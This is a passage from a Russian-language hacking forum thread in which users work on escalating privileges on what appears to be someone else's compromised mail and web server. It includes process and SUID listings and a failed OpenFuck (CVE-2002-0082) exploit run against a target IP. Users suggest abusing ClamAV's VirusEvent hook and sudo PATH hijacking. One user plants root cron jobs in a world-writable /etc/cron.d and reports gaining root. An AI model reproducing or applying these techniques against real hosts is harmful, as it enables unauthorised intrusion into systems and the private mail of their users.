apache    2842  2.2  1.2 460544 69340 ?        S    14:27   0:02 /usr/sbin/httpd
apache    2857  2.4  0.9 444696 52744 ?        S    14:27   0:03 /usr/sbin/httpd
root      2940  0.0  0.0   6524   172 ?        Ss   Aug27   0:00 gpm -m /dev/input/mice -t exps2
root      2990  0.0  0.0  74832   508 ?        Ss   Aug27   1:40 crond -p
root      3001  0.0  0.0  97316  2908 ?        Ss   Aug27   2:18 /usr/bin/perl -wT /usr/sbin/munin-node
root      3042  0.0  0.0      0     0 ?        S    14:28   0:00 [kworker/u8:3]
root      3047  0.0  0.0   3864   348 ?        S    Aug27   0:00 /var/www/vhcs2/daemon/vhcs2_daemon -p /var/run/vhcs2_daemon.pid
root      3073  0.0  0.0  18800   284 ?        Ss   Aug27   0:00 /usr/sbin/atd
root      3084  0.0  0.0  46836   868 ?        Ss   Aug27   1:03 /usr/sbin/saslauthd -m /var/spool/postfix/var/run/saslauthd -a pam -r -V -n 5
root      3085  0.0  0.0  46836   868 ?        S    Aug27   1:03 /usr/sbin/saslauthd -m /var/spool/postfix/var/run/saslauthd -a pam -r -V -n 5
root      3086  0.0  0.0  46836   868 ?        S    Aug27   1:03 /usr/sbin/saslauthd -m /var/spool/postfix/var/run/saslauthd -a pam -r -V -n 5
root      3087  0.0  0.0  46836   860 ?        S    Aug27   1:03 /usr/sbin/saslauthd -m /var/spool/postfix/var/run/saslauthd -a pam -r -V -n 5
root      3089  0.0  0.0  46836   860 ?        S    Aug27   1:03 /usr/sbin/saslauthd -m /var/spool/postfix/var/run/saslauthd -a pam -r -V -n 5
apache    3116  1.0  0.5 424740 32680 ?        S    14:28   0:00 /usr/sbin/httpd
68        3120  0.0  0.0  30772   524 ?        Ss   Aug27   0:00 hald
root      3121  0.0  0.0  21772   384 ?        S    Aug27   0:00 hald-runner
apache    3205  1.6  0.6 430552 38004 ?        S    14:28   0:01 /usr/sbin/httpd
vmail     3219  0.0  0.0  10436   856 ?        S    14:28   0:00 /usr/lib/courier/libexec/courier/courierpop3d /var/mail/virtual/*******.**/info
apache    3233  3.1  1.2 464256 72368 ?        S    14:28   0:02 /usr/sbin/httpd
root      3256  0.0  0.0   3864   312 tty1     Ss+  Aug27   0:00 /sbin/mingetty tty1
root      3257  0.0  0.0   3864   312 tty2     Ss+  Aug27   0:00 /sbin/mingetty tty2
root      3258  0.0  0.0   3864   312 tty3     Ss+  Aug27   0:00 /sbin/mingetty tty3
root      3259  0.0  0.0   3864   312 tty4     Ss+  Aug27   0:00 /sbin/mingetty tty4
apache    3301  3.0  1.0 450268 58072 ?        S    14:28   0:01 /usr/sbin/httpd
apache    3309  1.5  1.0 448640 56332 ?        S    14:29   0:00 /usr/sbin/httpd
root      3332  0.0  0.0   3864   312 tty5     Ss+  Aug27   0:00 /sbin/mingetty tty5
root      3333  0.0  0.0   3864   312 tty6     Ss+  Aug27   0:00 /sbin/mingetty tty6
apache    3405  2.5  0.6 426768 35400 ?        S    14:29   0:01 /usr/sbin/httpd
apache    3408  3.6  0.7 378272 41492 ?        S    14:29   0:01 /usr/sbin/httpd
apache    3414  1.2  0.6 427844 36348 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3415  1.6  0.5 366228 29624 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3416  5.1  1.2 459992 68092 ?        S    14:29   0:02 /usr/sbin/httpd
vmail     3430  0.0  0.0  16888   912 ?        S    14:29   0:00 /usr/lib/courier/bin/imapd /var/mail/virtual/*******.**/sales
root      3432  0.0  0.0  34000  1764 ?        S    14:29   0:00 couriertls -statusfd=7 -printx509=9 -localfd=5 -tcpd -server
vmail     3433  0.3  0.0  16900  1100 ?        S    14:29   0:00 /usr/lib/courier/bin/imapd /var/mail/virtual/*******.**/sales
root      3435  0.2  0.0  34000  1764 ?        S    14:29   0:00 couriertls -statusfd=7 -printx509=9 -localfd=5 -tcpd -server
apache    3449  2.2  0.6 427660 35680 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3450  0.6  0.6 371540 34388 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3451  1.6  0.6 430556 38680 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3461  0.0  0.4 365744 25772 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3462  3.1  1.1 397888 61624 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3469  1.2  0.5 370576 32588 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3470  1.9  0.6 373664 36124 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3473  2.2  0.5 366236 28544 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3474  4.4  1.3 468280 76680 ?        S    14:29   0:01 /usr/sbin/httpd
apache    3475  3.1  0.6 371500 33924 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3478  4.1  1.2 405728 69644 ?        S    14:29   0:01 /usr/sbin/httpd
apache    3479  1.6  0.5 369912 33132 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3481  0.9  0.5 366288 29588 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3482  1.6  0.5 366008 28992 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3483  4.4  1.2 462472 69884 ?        S    14:29   0:01 /usr/sbin/httpd
apache    3485  1.6  0.6 375036 38224 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3488  3.0  0.0      0     0 ?        Z    14:29   0:00 [httpd] <defunct>
apache    3489  1.0  0.6 374588 37360 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3490  4.4  0.9 389452 52288 ?        S    14:29   0:01 /usr/sbin/httpd
apache    3491  0.8  0.5 366468 29424 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3492  1.6  0.5 365916 28236 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3495  1.9  0.6 375004 37780 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3498  3.1  1.2 464904 72452 ?        S    14:29   0:00 /usr/sbin/httpd
root      3542  0.0  0.0      0     0 ?        S<   Aug27   0:00 [kworker/1:1H]
root      3543  0.0  0.0      0     0 ?        S<   Aug27   0:00 [kworker/3:1H]
apache    3575  6.5  0.5 368628 30704 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3576  1.3  0.5 366136 28376 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3577 16.0  0.5 368304 31312 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3578  2.5  0.5 365872 27988 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3579  4.0  0.5 366160 28340 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3580  2.0  0.5 366128 28180 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3581  0.0  0.4 366280 27432 ?        S    14:29   0:00 /usr/sbin/httpd
apache    3582  1.0  0.0  10860   880 ?        S    14:29   0:00 sh -c sh pes.sh 2>&1
apache    3583  2.0  0.0  10864  1124 ?        S    14:29   0:00 sh pes.sh
apache    3615  0.0  0.0  10528   908 ?        R    14:30   0:00 ps -aux
root      4171  0.0  0.0      0     0 ?        S<   Aug27   0:00 [kworker/2:1H]
vmail     4183  0.0  0.0  20796  4872 ?        S    Sep12   0:44 /usr/lib/courier/bin/imapd /var/mail/virtual/*******.**/vedeni
root      6859  0.0  0.0   3872   352 hvc0     Ss+  Aug27   0:00 /sbin/agetty hvc0 9600 vt100-nav
sqlgrey   7647  0.0  0.1 132852 10140 ?        Ss   Sep09   1:20 /usr/bin/perl -w /usr/sbin/sqlgrey -d
nobody   10167  0.1  0.0 123740  1716 ?        Ss   04:02   0:40 proftpd: (accepting connections)
named    12066  0.0  0.2 121372 12016 ?        Ssl  Sep11   0:02 /usr/sbin/named -u named
root     12167  0.0  0.0  71504  1536 ?        Ss   Sep11   0:20 /usr/libexec/postfix/master -w
postfix  12169  0.0  0.0  71936  1812 ?        S    Sep11   1:28 qmgr -l -t fifo -u -c
root     12176  0.0  0.0   3864   296 ?        S    Sep11   0:00 /usr/sbin/courierlogger -pid=/var/spool/authdaemon/pid -start /usr/libexec/courier-authlib/authdaemond
root     12177  0.0  0.0  16544   616 ?        S    Sep11   0:00 /usr/libexec/courier-authlib/authdaemond
root     12178  0.0  0.0  16964   996 ?        S    Sep11   0:11 /usr/libexec/courier-authlib/authdaemond
root     12180  0.0  0.0  16548   580 ?        S    Sep11   0:11 /usr/libexec/courier-authlib/authdaemond
root     12181  0.0  0.0  16964   992 ?        S    Sep11   0:11 /usr/libexec/courier-authlib/authdaemond
root     12182  0.0  0.0  16960   988 ?        S    Sep11   0:11 /usr/libexec/courier-authlib/authdaemond
root     12183  0.0  0.0  17360  1252 ?        S    Sep11   0:11 /usr/libexec/courier-authlib/authdaemond
root     12196  0.0  0.0   3864   300 ?        S    Sep11   0:09 /usr/sbin/courierlogger -pid=/var/spool/courier/tmp/pop3d.pid -start -name=pop3d /usr/lib/courier/sbin/couriertcpd -address=0 -maxprocs=40 -maxperip=20 -nodnslookup -noidentlookup 110 /usr/lib/courier/libexec/courier/courierpop3login /usr/lib/courier/libexec/courier/courierpop3d Maildir
root     12197  0.0  0.0   8060   556 ?        S    Sep11   0:17 /usr/lib/courier/sbin/couriertcpd -address=0 -maxprocs=40 -maxperip=20 -nodnslookup -noidentlookup 110 /usr/lib/courier/libexec/courier/courierpop3login /usr/lib/courier/libexec/courier/courierpop3d Maildir
root     12201  0.0  0.0   3864   300 ?        S    Sep11   0:02 /usr/sbin/courierlogger -pid=/var/spool/courier/tmp/pop3d-ssl.pid -start -name=pop3d-ssl /usr/lib/courier/sbin/couriertcpd -address=0 -maxprocs=40 -maxperip=20 -nodnslookup -noidentlookup 995 /usr/lib/courier/bin/couriertls -server -tcpd /usr/lib/courier/libexec/courier/courierpop3login /usr/lib/courier/libexec/courier/courierpop3d Maildir
root     12202  0.0  0.0   8060   556 ?        S    Sep11   0:04 /usr/lib/courier/sbin/couriertcpd -address=0 -maxprocs=40 -maxperip=20 -nodnslookup -noidentlookup 995 /usr/lib/courier/bin/couriertls -server -tcpd /usr/lib/courier/libexec/courier/courierpop3login /usr/lib/courier/libexec/courier/courierpop3d Maildir
root     12207  0.0  0.0   3864   288 ?        S    Sep11   0:07 /usr/sbin/courierlogger -pid=/var/spool/courier/tmp/imapd.pid -start -name=imapd /usr/lib/courier/sbin/couriertcpd -address=0 -maxprocs=40 -maxperip=20 -nodnslookup -noidentlookup 143 /usr/lib/courier/libexec/courier/imaplogin /usr/lib/courier/bin/imapd Maildir
root     12208  0.0  0.0   8060   524 ?        S    Sep11   0:12 /usr/lib/courier/sbin/couriertcpd -address=0 -maxprocs=40 -maxperip=20 -nodnslookup -noidentlookup 143 /usr/lib/courier/libexec/courier/imaplogin /usr/lib/courier/bin/imapd Maildir
root     12213  0.0  0.0   3864   292 ?        S    Sep11   0:01 /usr/sbin/courierlogger -pid=/var/spool/courier/tmp/imapd-ssl.pid -start -name=imapd-ssl /usr/lib/courier/sbin/couriertcpd -address=0 -maxprocs=40 -maxperip=20 -nodnslookup -noidentlookup 993 /usr/lib/courier/bin/couriertls -server -tcpd /usr/lib/courier/libexec/courier/imaplogin /usr/lib/courier/bin/imapd Maildir
root     12214  0.0  0.0   8060   520 ?        S    Sep11   0:02 /usr/lib/courier/sbin/couriertcpd -address=0 -maxprocs=40 -maxperip=20 -nodnslookup -noidentlookup 993 /usr/lib/courier/bin/couriertls -server -tcpd /usr/lib/courier/libexec/courier/imaplogin /usr/lib/courier/bin/imapd Maildir
postfix  12247  0.0  0.0  72140  1836 ?        S    Sep11   0:03 tlsmgr -l -t unix -u -c
postfix  12248  0.0  0.0  71728  1564 ?        S    Sep11   0:06 anvil -l -t unix -u -c
vmail    12326  0.0  0.0  13112  1004 ?        S    Sep11   0:27 /usr/libexec/gam_server
root     15446  0.0  0.0  55780  1768 ?        Sl   Aug29   9:11 /usr/bin/monit
root     15785  0.0  0.0      0     0 ?        S    13:45   0:00 [kworker/0:2]
postfix  15972  0.0  0.0  81524  5396 ?        S    13:45   0:00 smtpd -n smtp -t inet -u -c -o stress= -s 2
postfix  16002  0.0  0.0  81492  5252 ?        S    13:45   0:00 smtpd -n smtp -t inet -u -c -o stress= -s 2
postfix  16011  0.0  0.0  81492  5284 ?        S    13:45   0:00 smtpd -n smtp -t inet -u -c -o stress= -s 2
vmail    17374  0.0  0.0  16888   772 ?        S    13:48   0:00 /usr/lib/courier/bin/imapd /var/mail/virtual/*******.**/praha
root     17533  0.0  0.0      0     0 ?        S    13:49   0:00 [kworker/3:2]
vmail    17774  0.0  0.0  18976  1092 ?        S    13:49   0:00 /usr/lib/courier/bin/imapd /var/mail/virtual/*******.**/praha
postfix  19715  0.0  0.0  81564  5416 ?        S    13:54   0:00 smtpd -n smtp -t inet -u -c -o stress= -s 2
root     19726  0.0  0.0  33996  1764 ?        S    13:54   0:00 /usr/lib/courier/bin/couriertls -server -tcpd /usr/lib/courier/libexec/courier/imaplogin /usr/lib/courier/bin/imapd Maildir
root     19727  0.0  0.0  33996  1764 ?        S    13:54   0:00 /usr/lib/courier/bin/couriertls -server -tcpd /usr/lib/courier/libexec/courier/imaplogin /usr/lib/courier/bin/imapd Maildir
vmail    19728  0.0  0.0  19340  1528 ?        S    13:54   0:00 /usr/lib/courier/bin/imapd /var/mail/virtual/*******.**/*****
vmail    19729  0.0  0.0  21224  3496 ?        S    13:54   0:00 /usr/lib/courier/bin/imapd /var/mail/virtual/*******.**/info
vmail    20508  0.0  0.0  17640  1836 ?        S    12:32   0:02 /usr/lib/courier/bin/imapd /var/mail/virtual/*******.**/sales
root     20513  0.0  0.0  34000  1768 ?        S    12:32   0:00 couriertls -statusfd=7 -printx509=9 -localfd=5 -tcpd -server
root     20697  0.6  0.5 365744 29908 ?        Ss   Sep12  11:28 /usr/sbin/httpd
root     22241  0.0  0.0      0     0 ?        S    14:00   0:00 [kworker/u8:2]
vmail    22778  0.0  0.0  16888   776 ?        S    14:01   0:00 /usr/lib/courier/bin/imapd /var/mail/virtual/**********.**/dagmar
root     25479  0.0  0.0      0     0 ?        S    14:07   0:00 [kworker/u8:1]
vmail    26418  0.1  0.1  25264  9424 ?        S    11:19   0:14 /usr/lib/courier/bin/imapd /var/mail/virtual/*******.**/hotel
root     27070  0.0  0.0      0     0 ?        S    14:10   0:00 [kworker/2:2]
postfix  28236  0.0  0.0  81520  5360 ?        S    14:12   0:00 smtpd -n smtp -t inet -u -c -o stress= -s 2
postfix  28239  0.0  0.0  81360  4980 ?        S    14:12   0:00 smtpd -n smtp -t inet -u -c -o stress= -s 2
postfix  28248  0.0  0.0  81520  5384 ?        S    14:12   0:00 smtpd -n smtp -t inet -u -c -o stress= -s 2
root     28456  0.0  0.0  33996  1768 ?        S    11:25   0:00 /usr/lib/courier/bin/couriertls -server -tcpd /usr/lib/courier/libexec/courier/imaplogin /usr/lib/courier/bin/imapd Maildir
vmail    28457  0.0  0.1  23632  5760 ?        S    11:25   0:03 /usr/lib/courier/bin/imapd /var/mail/virtual/*******.**/kopecky
root     28985  0.0  0.0      0     0 ?        S    14:15   0:00 [kworker/1:0]
root     29430  0.0  0.0      0     0 ?        S    14:16   0:00 [kworker/3:0]
root     31515  0.0  0.0      0     0 ?        S    14:20   0:00 [kworker/2:0]
root     31821  0.0  0.0      0     0 ?        S    14:21   0:00 [kworker/0:0]
root     32217  0.0  0.0      0     0 ?        S    14:22   0:00 [kworker/1:1]

================================================
SUID FILES:
================================================
-rwsr-xr-x 1 root root 28336 Mar 21  2012 /bin/su
-rwsr-xr-x 1 root root 37312 Sep 26  2009 /bin/ping
-rwsr-xr-x 1 root root 32736 Sep 26  2009 /bin/ping6
-rwsr-xr-x 1 root root 61656 Nov  8  2012 /bin/mount
-rwsr-xr-x 1 root root 41592 Nov  8  2012 /bin/umount
-rwsr-xr-x 1 root root 19768 Jan  9  2013 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 14112 Jan  9  2013 /sbin/pam_timestamp_check
-rwsr-x--- 1 root dbus 48152 Oct  1  2013 /lib64/dbus-1/dbus-daemon-launch-helper
-r-sr-sr-x 1 daemon daemon 24728 May 15  2011 /usr/lib/courier/bin/cancelmsg
-r-s--x--x 1 root daemon 52288 May 15  2011 /usr/lib/courier/bin/sendmail
-r-sr-x--- 1 daemon daemon 7528 May 15  2011 /usr/lib/courier/libexec/courier/submitmkdir
-rwsr-xr-x 1 root root 51752 Jan  9  2013 /usr/bin/gpasswd
-rws--x--x 1 root root 20360 Nov  8  2012 /usr/bin/chsh
-rwsr-sr-x 1 root root 315640 Feb 22  2012 /usr/bin/crontab
-rwsr-xr-x 1 root root 27936 Aug 11  2010 /usr/bin/passwd
-rws--x--x 1 root root 22200 Nov  8  2012 /usr/bin/chfn
-rws--x--x 1 root root 80456 Oct  1  2013 /usr/bin/sperl5.8.8
-rwsr-xr-x 1 root root 49392 Jan 27  2010 /usr/bin/at
-rwsr-xr-x 1 root root 50696 Jan  9  2013 /usr/bin/chage
-rwsr-xr-x 1 root root 28552 Jan  9  2013 /usr/bin/newgrp
---s--x--x 1 root root 448512 Mar 17 04:45 /usr/libexec/openssh/ssh-keysign
-rwsr-sr-x 1 root root 18296 Mar 30  2013 /usr/sbin/uuidd
-rwsr-xr-x 1 root root 168105 Jul 15  2010 /usr/sbin/mtr
-r-s--x--- 1 root apache 15552 Apr  9 18:21 /usr/sbin/suexec
-rwsr-xr-x 1 root root 8848 Oct  1  2013 /usr/sbin/usernetctl
-rws--x--x 1 root root 37584 Mar 11  2009 /usr/sbin/userhelper
-rws--x--x 1 fax root 22320 Jan  7  2007 /usr/lib64/mgetty+sendfax/faxq-helper
Заметил, что много доступных для правки кронтабов и файлов в etc:

Код:
drwxrwxrwx  2 root   root       4096 Mar  7  2014 cron.d
...
-rw-rw-rw-  1 root   root      32187 Jun 26  2007 amavisd.conf
...
-rw-rw-rw-  1 root   root      24576 Sep 11 16:21 sasldb2
чтоб не загромождать тред: writable files&folders list тут

Какую тему курить?

Последний раз редактировалось ewi; 13.09.2014 в 19:27..
ewi вне форума   Ответить с цитированием
Старый 14.09.2014, 10:36   #1112
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию

https://github.com/vrtadmin/clamav-devel/blob/master/etc/clamd.conf.sample

Цитата:
# Execute a command when virus is found. In the command string %v will
# be replaced with the virus name.
# Default: no
#VirusEvent /usr/local/bin/send_sms 123456789 "VIRUS ALERT: %v"
Если AV от рута запущен, вот тебе лазейка.
b3 вне форума   Ответить с цитированием
Старый 14.09.2014, 14:07   #1113
ewi
 
Регистрация: 02.04.2014
Сообщений: 75
Репутация: 2
По умолчанию

Скорей всего от рута идет запуск, т. к. вот чего:

Код:
$ cat /etc/clamav.conf
...
# Execute a command when virus is found. In the command string %v will
# be replaced with the virus name.
# Default: no
#VirusEvent /usr/local/bin/send_sms 123456789 "VIRUS ALERT: %v"

# Run as another user (clamd must be started by root to make this option
# working). <-- oO
# Default: don't drop privileges
User clamav <-- hE hE hE
#User amavis
ewi вне форума   Ответить с цитированием
Старый 15.09.2014, 03:49   #1114
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Прошу гуру ответить, такая вот шняга выходит, не хочет коннектится:
Код:
./exploit 0x6b ip 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
read_ssl_packet: Record length out of range (rec_len = 0)
Код:
 Server: Apache/2.2.22 (Unix) PHP/5.4.7 mod_ssl/2.2.22 OpenSSL/1.0.0j DAV/2 mod_perl/2.0.7 Perl/v5.8.4
mod_ssl/2.2.22 OpenSSL/1.0.0j DAV/2 mod_perl/2.0.7 Perl/v5.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
nmap
Код:
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.2.22 ((Unix) PHP/5.4.7 mod_ssl/2.2.22 OpenSSL/1.0.0j DAV/2 mod_perl/2.0.7 Perl/v5.8.4)
443/tcp  open  http    Apache httpd 2.2.22 ((Unix) PHP/5.4.7 mod_ssl/2.2.22 OpenSSL/1.0.0j DAV/2 mod_perl/2.0.7 Perl/v5.8.4)
8080/tcp open  http    Apache httpd 2.2.22 ((Unix) PHP/5.4.7 mod_ssl/2.2.22 OpenSSL/1.0.0j DAV/2 mod_perl/2.0.7 Perl/v5.8.4)
sploit http://www.exploit-db.com/exploits/764/

Последний раз редактировалось z0mbie; 15.09.2014 в 05:03..
z0mbie вне форума   Ответить с цитированием
Старый 15.09.2014, 09:33   #1115
Enigma
 
Аватар для Enigma
 
Регистрация: 17.06.2013
Сообщений: 37
Репутация: 12
По умолчанию

Цитата:
Сообщение от z0mbie Посмотреть сообщение
Прошу гуру ответить, такая вот шняга выходит, не хочет коннектится:
Код:
./exploit 0x6b ip 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
read_ssl_packet: Record length out of range (rec_len = 0)
Код:
 Server: Apache/2.2.22 (Unix) PHP/5.4.7 mod_ssl/2.2.22 OpenSSL/1.0.0j DAV/2 mod_perl/2.0.7 Perl/v5.8.4
mod_ssl/2.2.22 OpenSSL/1.0.0j DAV/2 mod_perl/2.0.7 Perl/v5.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
nmap
Код:
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.2.22 ((Unix) PHP/5.4.7 mod_ssl/2.2.22 OpenSSL/1.0.0j DAV/2 mod_perl/2.0.7 Perl/v5.8.4)
443/tcp  open  http    Apache httpd 2.2.22 ((Unix) PHP/5.4.7 mod_ssl/2.2.22 OpenSSL/1.0.0j DAV/2 mod_perl/2.0.7 Perl/v5.8.4)
8080/tcp open  http    Apache httpd 2.2.22 ((Unix) PHP/5.4.7 mod_ssl/2.2.22 OpenSSL/1.0.0j DAV/2 mod_perl/2.0.7 Perl/v5.8.4)
sploit http://www.exploit-db.com/exploits/764/
Это бага 2002 года, что-то мне не кажется что её можно проэксплоитить.

PHP/5.4.7 зарелизен 13 Sep 2012, скорее всего тут какая-то путаница с версиями mod_ssl.
Enigma вне форума   Ответить с цитированием
Старый 15.09.2014, 09:41   #1116
Enigma
 
Аватар для Enigma
 
Регистрация: 17.06.2013
Сообщений: 37
Репутация: 12
По умолчанию

Цитата:
Сообщение от slashd Посмотреть сообщение
немного поигрался с sudo и bash-скриптами. Если в bash/sh скрипте не указаны полные пути до исполняемых файлов, то можно выполнить команды от рута с помощью определения переменной PATH:

Код:
$ sudo -l
Password: 
Sorry, try again.
Password: 
Matching Defaults entries for greeny on this host:
    env_reset, !secure_path

User greeny may run the following commands on this host:
    (ALL) /home/greeny/rtorrent/down/tset.sh
$ sudo id
Sorry, user greeny is not allowed to execute '/usr/bin/id' as root on cuba.
$ sudo /home/greeny/rtorrent/down/tset.sh
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),26(tape),27(video)
$ cat /home/greeny/rtorrent/down/tset.sh
id
$ ls -al /tmp/id
-rwxr-xr-x 1 greeny greeny 5 Sep  4 00:04 /tmp/id
$ cat /tmp/id
bash
$ sudo /home/greeny/rtorrent/down/tset.sh
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),26(tape),27(video)
$ export PATH=/tmp:$PATH
$ sudo /home/greeny/rtorrent/down/tset.sh
# rm -rf /tmp/id
# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),26(tape),27(video)
#
Это при неправильной конфигурации только работает, у тебя:
Код:
$ sudo -l
Password: 
Sorry, try again.
Password: 
Matching Defaults entries for greeny on this host:
    env_reset, !secure_path
На дебиане например при дефолтной настройке:
Код:
sudo -l
[sudo] password for sky: 
Matching Defaults entries for sky on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Последний раз редактировалось Enigma; 15.09.2014 в 09:46..
Enigma вне форума   Ответить с цитированием
Старый 15.09.2014, 09:57   #1117
slashd
 
Регистрация: 06.07.2010
Сообщений: 47
Репутация: 27
По умолчанию

Цитата:
Сообщение от Enigma Посмотреть сообщение
Это при неправильной конфигурации только работает, у тебя:
Код:
$ sudo -l
Password: 
Sorry, try again.
Password: 
Matching Defaults entries for greeny on this host:
    env_reset, !secure_path
На дебиане например при дефолтной настройке:
Код:
sudo -l
[sudo] password for sky: 
Matching Defaults entries for sky on this host:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Точно, совсем забыл о том, устанавливал свои пути для sudo =/
slashd вне форума   Ответить с цитированием
Старый 16.09.2014, 09:52   #1118
ewi
 
Регистрация: 02.04.2014
Сообщений: 75
Репутация: 2
По умолчанию

Цитата:
Сообщение от b3 Посмотреть сообщение
https://github.com/vrtadmin/clamav-devel/blob/master/etc/clamd.conf.sample
Если AV от рута запущен, вот тебе лазейка.
Всё было бы четко, но clamd, как оказалось не установлен, а он инсталлится дополнительно к clamav. А clamscan я так понял этот конф не использует....

Я заметил, что в cron.d можно править что угодно. Содержание одного из файлов:
Код:
MAILTO=""
* * * * * root /root/server-status
Это же значит, что каждую секунду выполняется крон-таб от имени рута? А если править, надо ли делать перезапуск крона?

Последний раз редактировалось ewi; 16.09.2014 в 09:56..
ewi вне форума   Ответить с цитированием
Старый 16.09.2014, 15:28   #1119
SuvSomat
 
Регистрация: 09.10.2012
Сообщений: 10
Репутация: 0
По умолчанию

Цитата:
А если править, надо ли делать перезапуск крона?
не нужно
SuvSomat вне форума   Ответить с цитированием
Старый 16.09.2014, 19:04   #1120
ewi
 
Регистрация: 02.04.2014
Сообщений: 75
Репутация: 2
По умолчанию

Цитата:
Сообщение от SuvSomat Посмотреть сообщение
не нужно
Вроде не нужно, проверил на локальном линуксе. На целевой и локальной системе добавил задание:
Код:
* * * * * root id>/tmp/cache1
На локальном через минуту:
Код:
[user@localhost tmp]# cat cache1
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023
Целевая: жду уже полчаса, ничего не происходит.
Демон в процессах висит:
Код:
$ ps aux
...
root      2990  0.0  0.0  74832   940 ?        Ss   Aug27   1:58 crond -p
Почему может не работать?

---

На данный момент рут получен. Но я всё же не допираю. Если крон выполняет всю папку cron.d, то почему одни скрипты исполняет, а другие игнорит, вот загадка!

Содержимое одного таба - не выполняет ((
Код:
#!/bin/bash

#*/60 * * * * root /usr/bin/awstats_updateall.pl now -confdir="/etc" -awstatsprog="/var/www/awstats/awstats.pl" >/dev/null
* * * * * root id >/tmp/cache1
2-й - не выполняет :
Код:
MAILTO=""
00  1 * * * root wget -O /dev/null "http://www.***/***.php" &> /dev/null
00  3 * * * root wget -O /dev/null "http://www.***/***.php" &> /dev/null
00  2 * * * root wget -O /dev/null "http://www.***/***.php" &> /dev/null
#00  4 * * * root wget -O /dev/null "http://www.***/***.php" &> /dev/null
#00  3 * * * root wget -O /dev/null "http://www.***/***.php" &> /dev/null
* * * * * root id > /tmp/cache2
3-й:
Код:
MAILTO=""
* *  * * * root sh /tmp/test.sh > /dev/null
0 7  * * * root wget -O /dev/null www.***.php?*** > /dev/null
0 7  * * * root wget -O /dev/null www.***.php?*** > /dev/null
0 12 * * * root wget -O /dev/null www.***.php?*** > /dev/null
0 12 * * * root wget -O /dev/null www.***.php?*** > /dev/null
Код:
$ cat /tmp/test.sh
#!/bin/bash
id>/tmp/123
Результат:
Код:
$ cat 123
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
каждую минуту...

Последний раз редактировалось ewi; 16.09.2014 в 22:34.. Причина: добавил пост
ewi вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot